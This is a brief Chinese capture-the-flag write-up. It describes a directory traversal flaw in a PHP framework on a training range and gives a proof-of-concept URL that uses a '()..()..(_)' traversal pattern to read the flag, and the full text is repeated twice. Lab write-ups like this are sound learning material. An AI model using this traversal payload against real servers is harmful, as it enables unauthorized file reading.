1.阅读靶场介绍
这里我们可以得到的有用信息就是
未对输入进行过滤,造成目录穿越读取
也就是直接访问的形式,实现目录穿越
2.启动靶场
我们会得到下图所示的页面
这里的一片叶子php的框架
3.poc
这里我们直接访问下面的url
https://eci-2zegmphv122dc7q5jdxs.cloudeci1.ichunqiu.com:8888//1/1/()..()..(_)/flag
到此各位彦祖和亦非们又攻克一个靶场了
期待博主攻克任何靶场的欢迎留言哟
感谢你们宝贵的时间
1.阅读靶场介绍
这里我们可以得到的有用信息就是
未对输入进行过滤,造成目录穿越读取
也就是直接访问的形式,实现目录穿越
2.启动靶场
我们会得到下图所示的页面
这里的一片叶子php的框架
3.poc
这里我们直接访问下面的url
https://eci-2zegmphv122dc7q5jdxs.cloudeci1.ichunqiu.com:8888//1/1/()..()..(_)/flag
到此各位彦祖和亦非们又攻克一个靶场了
期待博主攻克任何靶场的欢迎留言哟
感谢你们宝贵的时间